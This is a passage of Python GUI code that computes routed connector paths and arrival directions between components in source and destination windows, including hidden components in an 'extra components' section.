path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 1
else:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] + vDist)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
boundingRect = path.boundingRect()
return path, arrival, direction, boundingRect
# ---------------------- #
# --- NEIGHBORING WINDOWS --- #
# We only have special cases when the components are on the inside halves of the neighboring windows
# or if they are extra components
elif numWin is 0:
if dstPoints[0][1] > srcPoints[0][1]: # Dst is below src
if ((srcInECSection or srcCompCenter[1] > srcWinRect[1] + srcWinRect[3] / 2)
and (dstInECSection or dstCompCenter[1] < dstWinRect[1] + dstWinRect[3] / 2)):
if srcInECSection:
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = srcWinRect[0] + srcWinRect[2] + ecEnterDist + 30 - srcPadding # 30 is max pad
compHiddenOnLeft = srcPoints[1][0] - srcPadding < leftPausePoint
compHiddenOnRight = srcPoints[1][0] - srcPadding > srcWinRect[0] + srcWinRect[2] + \
srcECSWidth - ecEnterDist
if compHiddenOnLeft:
if srcPoints[2][0] + srcPadding > srcWinRect[0] + srcWinRect[2]:
bottom = srcPoints[3]
right = srcPoints[2]
left = srcPoints[1]
if left[0] > leftPausePoint:
path.moveTo(left[0], left[1])
path.lineTo(leftPausePoint, left[1])
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
elif right[0] > leftPausePoint:
path.moveTo(leftPausePoint, bottom[1])
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
elif right[0] + srcPadding > leftPausePoint:
path.moveTo(right[0], right[1])
path.lineTo(leftPausePoint, right[1])
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
elif right[0] + srcPadding > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, dstWinRect[1] - vDistDst)
elif right[0] > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2],
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
elif compHiddenOnRight:
if srcPoints[1][0] < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
# Not hidden yet but close
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
elif srcPoints[1][0] - srcPadding < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
left = srcPoints[1]
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
dstWinRect[1] - vDistDst)
else:
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, dstWinRect[1] - vDistDst)
else: # Src Comp in bottom half of its win
path.moveTo(srcPoints[3][0], srcPoints[3][1])
path.lineTo(srcPoints[3][0], dstWinRect[1] - vDistDst)
# Destination
if dstInECSection:
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = dstWinRect[0] + dstWinRect[2] + ecEnterDist + 30 - dstPadding # 30 is max pad
compHiddenOnLeft = dstPoints[1][0] - dstPadding < leftPausePoint
compHiddenOnRight = dstPoints[1][0] - dstPadding > dstWinRect[0] + dstWinRect[2] + \
dstECSWidth - ecEnterDist
if compHiddenOnLeft:
if dstPoints[2][0] + dstPadding > dstWinRect[0] + dstWinRect[2]:
# For smoother animation. Not hidden yet
top = dstPoints[0]
right = dstPoints[2]
left = dstPoints[1]
if left[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
path.lineTo(leftPausePoint, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif right[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
path.lineTo(leftPausePoint, top[1])
arrival = (leftPausePoint, top[1])
direction = 0
elif right[0] + dstPadding > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
path.lineTo(leftPausePoint, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] + dstPadding > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(right[0] + dstPadding, dstWinRect[1] - vDistDst)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(dstWinRect[0] + dstWinRect[2], right[1])
arrival = (dstWinRect[0] + dstWinRect[2], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
path.lineTo(dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + ecHiddenHeight)
direction = 2
elif compHiddenOnRight:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
if dstPoints[1][0] < dstWinRect[0] + dstWinRect[
2] + dstECSWidth: # Not hidden yet but close
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif dstPoints[1][0] - dstPadding < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
direction = 1
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + ecHiddenHeight)
direction = 1
else:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] - vDistDst)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
else: # Dst Comp in top half of its win
path.lineTo(dstPoints[0][0], dstWinRect[1] - vDistDst)
path.lineTo(dstPoints[0][0], dstPoints[0][1])
arrival = (dstPoints[0][0], dstPoints[0][1])
direction = 0
boundingRect = path.boundingRect()
return path, arrival, direction, boundingRect
# Dst above src
else:
if ((srcInECSection or srcCompCenter[1] <= srcWinRect[1] + srcWinRect[3] / 2)
and (dstInECSection or dstCompCenter[1] >= dstWinRect[1] + dstWinRect[3] / 2)):
if srcInECSection:
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = srcWinRect[0] + srcWinRect[2] + ecEnterDist + 30 - srcPadding # 30 is max pad
compHiddenOnLeft = srcPoints[1][0] - srcPadding < leftPausePoint
compHiddenOnRight = srcPoints[1][0] - srcPadding > srcWinRect[0] + srcWinRect[2] + \
srcECSWidth - ecEnterDist
if compHiddenOnLeft:
if srcPoints[2][0] + srcPadding >= srcWinRect[0] + srcWinRect[2]:
bottom = srcPoints[3]
right = srcPoints[2]
left = srcPoints[1]
if left[0] > leftPausePoint:
path.moveTo(left[0], left[1])
path.lineTo(leftPausePoint, left[1])
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
elif right[0] > leftPausePoint:
path.moveTo(leftPausePoint, bottom[1])
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
elif right[0] + srcPadding > leftPausePoint:
path.moveTo(right[0], right[1])
path.lineTo(leftPausePoint, right[1])
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
elif right[0] + srcPadding > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, dstWinRect[1] + dstWinRect[3] + vDistDst)
elif right[0] > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist, srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
elif compHiddenOnRight:
if srcPoints[1][0] < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
# Not hidden yet but close
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + ecHiddenHeight)
elif srcPoints[1][0] - srcPadding < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
left = srcPoints[1]
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + ecHiddenHeight)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
else:
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, dstWinRect[1] + dstWinRect[3] + vDistDst)
else: # Src Comp in top half of its win
path.moveTo(srcPoints[0][0], srcPoints[0][1])
path.lineTo(srcPoints[0][0], dstWinRect[1] + dstWinRect[3] + vDistDst)
# Destination
if dstInECSection:
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = dstWinRect[0] + dstWinRect[2] + ecEnterDist + 30 - dstPadding # 30 is max pad
compHiddenOnLeft = dstPoints[1][0] - dstPadding < leftPausePoint
compHiddenOnRight = dstPoints[1][0] - dstPadding > dstWinRect[0] + dstWinRect[2] + \
dstECSWidth - ecEnterDist
if compHiddenOnLeft:
if dstPoints[2][0] + dstPadding > dstWinRect[0] + dstWinRect[2]:
# For smoother animation. Not hidden yet
bottom = dstPoints[3]
right = dstPoints[2]
left = dstPoints[1]
if left[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(leftPausePoint, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif right[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(leftPausePoint, bottom[1])
arrival = (leftPausePoint, bottom[1])
direction = 3
elif right[0] + dstPadding > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(leftPausePoint, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] + dstPadding > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(dstWinRect[0] + dstWinRect[2], right[1])
arrival = (dstWinRect[0] + dstWinRect[2], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (
dstWinRect[0] + dstWinRect[2], dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 2
elif compHiddenOnRight:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
if dstPoints[1][0] < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
# Not hidden yet but close
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif dstPoints[1][0] - dstPadding < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
direction = 1
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 1
else:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
else: # Dst Comp in bottom half of its win
path.lineTo(dstPoints[3][0], dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstPoints[3][0], dstPoints[3][1])
arrival = (dstPoints[3][0], dstPoints[3][1])
direction = 3
boundingRect = path.boundingRect()
return path, arrival, direction, boundingRect
# ------------------------ #
# --- LEAVING SOURCE --- #
if not srcInECSection:
# If in left 6th of containing window, exit through left
if srcCompCenter[0] <= srcWinRect[0] + srcWinRect[2] / 6:
left = srcPoints[1] # x, y coordinate tuple
path.moveTo(left[0], left[1])
path.lineTo(srcWinRect[0] - hDist, left[1])
# Else if in top half of window, exit through top, and go left
elif srcCompCenter[1] <= srcWinRect[1] + srcWinRect[3] / 2:
top = srcPoints[0]
path.moveTo(top[0], top[1])
path.lineTo(top[0], srcWinRect[1] - vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] - vDistSrc)
# Else in bottom half of window, exit through bottom, and go left
elif srcCompCenter[1] > srcWinRect[1] + srcWinRect[3] / 2:
bottom = srcPoints[3]
path.moveTo(bottom[0], bottom[1])
path.lineTo(bottom[0], srcWinRect[1] + srcWinRect[3] + vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] + srcWinRect[3] + vDistSrc)
else:
raise Exception("Src: This shouldn't happen.")
# In Extra Components Section
else:
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = srcWinRect[0] + srcWinRect[2] + ecEnterDist + 30 - srcPadding # 30 is max pad
compHiddenOnLeft = srcPoints[1][0] - srcPadding < leftPausePoint
compHiddenOnRight = srcPoints[1][0] - srcPadding > srcWinRect[0] + srcWinRect[2] + \
srcECSWidth - ecEnterDist
if dstPoints[0][1] > srcPoints[0][1]: # If destination is below source
if compHiddenOnLeft:
if srcPoints[2][0] + srcPadding > srcWinRect[0] + srcWinRect[2]:
bottom = srcPoints[3]
right = srcPoints[2]
left = srcPoints[1]
if left[0] > leftPausePoint:
path.moveTo(left[0], left[1])
path.lineTo(leftPausePoint, left[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDistSrc)
elif right[0] > leftPausePoint:
path.moveTo(leftPausePoint, bottom[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDistSrc)
elif right[0] + srcPadding > leftPausePoint:
path.moveTo(right[0], right[1])
path.lineTo(leftPausePoint, right[1])
path.lineTo(leftPausePoint, srcWinRect[1] + srcWinRect[3] + vDistSrc)
elif right[0] + srcPadding > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] + vDistSrc)
elif right[0] > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDistSrc)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDistSrc)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] + srcWinRect[3] + vDistSrc)
elif compHiddenOnRight:
if srcPoints[1][0] < srcWinRect[0] + srcWinRect[2] + srcECSWidth: # Not hidden yet but close
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
elif srcPoints[1][0] - srcPadding < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
left = srcPoints[1]
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] + srcWinRect[3] + vDistSrc)
else:
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] + vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] + srcWinRect[3] + vDistSrc)
else: # Destination is above source
if compHiddenOnLeft:
if srcPoints[2][0] + srcPadding > srcWinRect[0] + srcWinRect[2]:
bottom = srcPoints[3]
right = srcPoints[2]
left = srcPoints[1]
if left[0] > leftPausePoint:
path.moveTo(left[0], left[1])
path.lineTo(leftPausePoint, left[1])
path.lineTo(leftPausePoint, srcWinRect[1] - vDistSrc)
elif right[0] > leftPausePoint:
path.moveTo(leftPausePoint, bottom[1])
path.lineTo(leftPausePoint, srcWinRect[1] - vDistSrc)
elif right[0] + srcPadding > leftPausePoint:
path.moveTo(right[0], right[1])
path.lineTo(leftPausePoint, right[1])
path.lineTo(leftPausePoint, srcWinRect[1] - vDistSrc)
elif right[0] + srcPadding > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] - vDistSrc)
elif right[0] > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] - vDistSrc)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist, srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist, srcWinRect[1] - vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] - vDistSrc)
elif compHiddenOnRight:
if srcPoints[1][0] < srcWinRect[0] + srcWinRect[2] + srcECSWidth: # Not hidden yet but close
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + ecHiddenHeight)
elif srcPoints[1][0] - srcPadding < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
left = srcPoints[1]
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + ecHiddenHeight)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] - vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] - vDistSrc)
else:
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] - vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] - vDistSrc)
# ---------------------- #
# --- TO DESTINATION --- #
# Basically the same algorithm as leaving src, except all steps are reversed
if not dstInECSection:
# If in left 6th of containing window, enter through left
if dstCompCenter[0] <= dstWinRect[0] + dstWinRect[2] / 6:
direction = 1
left = dstPoints[direction] # x, y coordinate tuple
path.lineTo(srcWinRect[0] - hDist, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
# Else if in top half of window, enter through top, coming from the left
elif dstCompCenter[1] <= dstWinRect[1] + dstWinRect[3] / 2:
direction = 0
top = dstPoints[direction]
path.lineTo(srcWinRect[0] - hDist, dstWinRect[1] - vDistDst)
path.lineTo(top[0], dstWinRect[1] - vDistDst)
path.lineTo(top[0], top[1])
arrival = (top[0], top[1])
# Else in bottom half of window, enter through bottom, coming from the left
elif dstCompCenter[1] > dstWinRect[1] + dstWinRect[3] / 2:
direction = 3
bottom = dstPoints[direction]
path.lineTo(srcWinRect[0] - hDist, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(bottom[0], dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(bottom[0], bottom[1])
arrival = (bottom[0], bottom[1])
else:
raise Exception("Dst: This shouldn't happen.")
# In Extra Components Section
else:
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = dstWinRect[0] + dstWinRect[2] + ecEnterDist + 30 - dstPadding # 30 is max pad
compHiddenOnLeft = dstPoints[1][0] - dstPadding < leftPausePoint
compHiddenOnRight = dstPoints[1][0] - dstPadding > dstWinRect[0] + dstWinRect[2] + \
dstECSWidth - ecEnterDist
if srcPoints[0][1] > dstPoints[0][1]: # If destination is above source
if compHiddenOnLeft:
